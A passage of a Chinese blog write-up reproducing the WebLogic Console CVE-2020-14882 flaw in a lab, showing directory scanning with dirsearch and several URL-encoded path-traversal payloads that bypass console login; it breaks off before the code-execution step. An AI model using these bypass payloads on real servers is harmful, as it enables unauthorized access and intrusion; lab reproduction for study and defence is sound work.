Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882,3)

本文详细介绍了如何复现Weblogic Console的CVE-2020-14882远程代码执行漏洞,包括信息收集、权限漏洞绕过、手工提交利用等步骤,最终成功获取webshell。
摘要由CSDN通过智能技术生成
更多黑客技能 公众号:暗网黑客
作者:掌控安全-xiao_yi

0x01 信息收集

打开靶场地址,看到404页面不要慌张,先进行信息收集!

image.png

由于是靶场,就进行目录扫描,就不用进行子域名爆破了~

利用dirsearch进行爆破:

python3 dirsearch/dirsearch.py -u "http://172.23.26.66:7001/" -e \*

image.png

先访问200页面发现全是空页面,再尝试访问302重定向后的页面,发现了新天地!

image.png

发现这是一个WebLogic, 并且有版本号,此时只用百度一下,就发现了该版本存在多个漏洞,最后我将它定位在 CVE-2020-14882

0x02 复现

在读完博客中大佬对该漏洞的复现之后,尝试自己进行复现并拿到webshell。

0#01 权限漏洞绕过

在最初的这个页面,是需要账号和用户名登录才可以进入后台,但是这里可以进行目录的骚操作来进行直接无密码登录后台。

http://172.23.26.66:7001/console/css/../console.portal

这条构造的url表示由于 …/在目录中表示返回上一级目录, 即console这个目录,然后访问该目录下的后台文件

image.png

但是运行结果并不像我们像的那样, 还是被重定向到登陆页面

这里就需要一些小技巧进行绕过,用burp的url编码功能对…/进行编码

http://172.23.26.66:7001/console/images/%2E%2E%2Fconsole.portal

结果还是被重定向了

将大写换成小写

http://172.23.26.66:7001/console/images/%2e%2e%2fconsole.portal无果

再进行一次url编码

http://172.23.26.66:7001/console/images/%252e%252e%252fconsole
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值